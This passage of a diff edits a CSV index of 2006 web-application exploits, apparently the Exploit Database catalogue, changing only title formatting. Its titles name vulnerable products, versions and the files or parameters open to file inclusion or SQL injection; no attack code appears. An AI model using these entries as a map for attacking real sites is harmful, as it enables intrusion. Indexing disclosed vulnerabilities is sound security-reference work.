'addressbook.add.php' Remote Code Execution",2006-05-06,[Oo],php,webapps,0 +1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - 'shopcurrency.asp' SQL Injection",2006-05-06,tracewar,asp,webapps,0 1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0 1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 -1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0 -1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - (ldap.inc.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0 +1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - 'authldap.php' Remote File Inclusion",2006-05-08,beford,php,webapps,0 +1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - 'ldap.inc.php' Remote File Inclusion",2006-05-08,beford,php,webapps,0 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - (rf) Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - (rf) Remote File Inclusion",2006-05-08,ReZEN,php,webapps,0 1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 @@ -16238,7 +16241,7 @@ id,file,description,date,author,platform,type,port 1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 -1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 +1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' Parameter SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection",2006-05-16,rgod,php,webapps,0 @@ -16250,7 +16253,7 @@ id,file,description,date,author,platform,type,port 1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - 'layid' SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion",2006-05-20,Kacper,php,webapps,0 -1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0 +1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - 'links.php' SQL Injection",2006-05-20,666,php,webapps,0 1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x < 6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 @@ -16259,17 +16262,17 @@ id,file,description,date,author,platform,type,port 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 1821,platforms/php/webapps/1821.php,"Drupal 4.7 - (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 -1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - (404.php) Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 -1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - (BE_config.php) Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 +1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 +1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1826,platforms/php/webapps/1826.txt,"Socketmail 2.2.6 - (site_path) Remote File Inclusion",2006-05-25,Aesthetico,php,webapps,0 1827,platforms/php/webapps/1827.txt,"V-Webmail 1.6.4 - (pear_dir) Remote File Inclusion",2006-05-25,beford,php,webapps,0 -1828,platforms/php/webapps/1828.txt,"DoceboLms 2.0.5 - (help.php) Remote File Inclusion",2006-05-25,beford,php,webapps,0 +1828,platforms/php/webapps/1828.txt,"DoceboLms 2.0.5 - 'help.php' Remote File Inclusion",2006-05-25,beford,php,webapps,0 1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1832,platforms/php/webapps/1832.txt,"Plume CMS 1.0.3 - (manager_path) Remote File Inclusion",2006-05-26,beford,php,webapps,0 1833,platforms/asp/webapps/1833.txt,"qjForum - 'member.asp' SQL Injection",2006-05-26,ajann,asp,webapps,0 1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2006-05-26,ajann,asp,webapps,0 1835,platforms/php/webapps/1835.txt,"Hot Open Tickets 11012004 - (CLASS_PATH) Remote File Inclusion",2006-05-27,Kacper,php,webapps,0 -1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - (forum.asp) SQL Injection",2006-05-27,ajann,asp,webapps,0 +1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - 'forum.asp' SQL Injection",2006-05-27,ajann,asp,webapps,0 1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - SQL Injection (Add Admin)",2006-05-27,nukedx,asp,webapps,0 1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0 1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0 @@ -16290,14 +16293,14 @@ id,file,description,date,author,platform,type,port 1857,platforms/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution",2006-06-01,Hessam-x,php,webapps,0 1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,php,webapps,0 1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 -1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Inclusion",2006-06-01,beford,php,webapps,0 +1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - 'server.php' Remote File Inclusion",2006-06-01,beford,php,webapps,0 1861,platforms/php/webapps/1861.txt,"Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps,0 -1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - (Wiki.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 +1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - 'Wiki.php' Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 -1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 +1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - 'common-menu.php' Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final - 'phpbb_root_path' Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 1868,platforms/php/webapps/1868.php,"PixelPost 1-5rc1-2 - Privilege Escalation",2006-06-03,rgod,php,webapps,0 -1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote File Inclusion",2006-06-03,rgod,php,webapps,0 +1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Arbitrary Remote File Inclusion",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 @@ -16310,11 +16313,11 @@ id,file,description,date,author,platform,type,port 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0 -1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 -1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - (adminLogin.asp) Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 +1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 +1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - (fileroot) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 -1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 -1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 +1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - 'post.php' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 +1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - 'jpcache.php' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution",2006-06-08,K-sPecial,php,webapps,0 @@ -16330,11 +16333,11 @@ id,file,description,date,author,platform,type,port 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 1904,platforms/php/webapps/1904.php,"blur6ex 0.3.462 - 'ID' Admin Disclosure / Blind SQL Injection",2006-06-12,rgod,php,webapps,0 1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 -1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - (visview.php) Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 +1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - 'visview.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps,0 1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Inclusion",2006-06-14,Kacper,php,webapps,0 -1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - (template.php) File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 +1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 @@ -16365,19 +16368,19 @@ id,file,description,date,author,platform,type,port 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - Remote Create Admin",2006-06-25,Hessam-x,php,webapps,0 -1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 +1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - 'auth.api.php' Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 1955,platforms/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0 -1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Inclusion",2006-06-28,marriottvn,php,webapps,0 +1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps,0 1969,platforms/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 -1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 -1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - (header.inc.php) Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 +1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - 'dbinstall.php' Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 +1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1974,platforms/php/webapps/1974.txt,"SmartSite CMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1981,platforms/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 @@ -16391,13 +16394,13 @@ id,file,description,date,author,platform,type,port 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution",2006-07-10,Hessam-x,php,webapps,0 -2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 +2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - 'gore.php' Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Parameter Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps,0 -2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote File Inclusion",2006-07-16,igi,php,webapps,0 +2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,php,webapps,0 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0 @@ -16426,7 +16429,7 @@ id,file,description,date,author,platform,type,port 2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'Username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 -2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution",2006-07-25,rgod,php,webapps,0 +2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - 'rfiles.php' Remote Command Execution",2006-07-25,rgod,php,webapps,0 2077,platforms/php/webapps/2077.txt,"WMNews 0.2a - (base_datapath) Remote File Inclusion",2006-07-27,uNfz,php,webapps,0 2078,platforms/php/webapps/2078.txt,"Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion",2006-07-27,Dr.Jr7,php,webapps,0 2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 @@ -16442,7 +16445,7 @@ id,file,description,date,author,platform,type,port 2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b - (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 -2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - (copyright.php) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 +2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - 'copyright.php' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - (subdir) Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 2100,platforms/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Parameter Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2101,platforms/php/webapps/2101.txt,"newsReporter 1.1 - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ -16450,19 +16453,19 @@ id,file,description,date,author,platform,type,port 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection (mq=off)",2006-08-01,rgod,php,webapps,0 -2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/phpBB.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 +2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion",2006-08-02,|peti,php,webapps,0 2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeAdmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 -2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0 +2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - 'colorswitch.php' Remote File Inclusion",2006-08-02,beford,php,webapps,0 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0 2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 -2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0 +2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - 'tpl.inc.php' Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0 2125,platforms/php/webapps/2125.txt,"Joomla! Component JD-Wiki 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0 2127,platforms/php/webapps/2127.txt,"ModernBill 1.6 - 'config.php' Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2128,platforms/php/webapps/2128.txt,"SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 @@ -16475,7 +16478,7 @@ id,file,description,date,author,platform,type,port 2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - 'abs_path' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 -2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,80 +2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - 'Core.php' Remote File Inclusion",2006-08-07,Minion,php,webapps,80 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps,0 @@ -16486,10 +16489,10 @@ id,file,description,date,author,platform,type,port 2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80 2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps,0 2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80 -2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion",2006-08-09,Drago84,php,webapps,0 +2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - 'owimg.php3' Remote File Inclusion",2006-08-09,Drago84,php,webapps,0 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 -2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,80 +2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - 'view_com.php' SQL Injection",2006-08-09,simo64,php,webapps,80 2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution",2006-08-10,simo64,php,webapps,80 2163,platforms/php/webapps/2163.txt,"PHPWCMS 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 @@ -16497,29 +16500,29 @@ id,file,description,date,author,platform,type,port 2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80 2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 -2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0 +2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - 'online.php' SQL Injection",2006-08-10,brOmstar,php,webapps,0 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 2172,platforms/php/webapps/2172.txt,"Mambo Component Remository 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 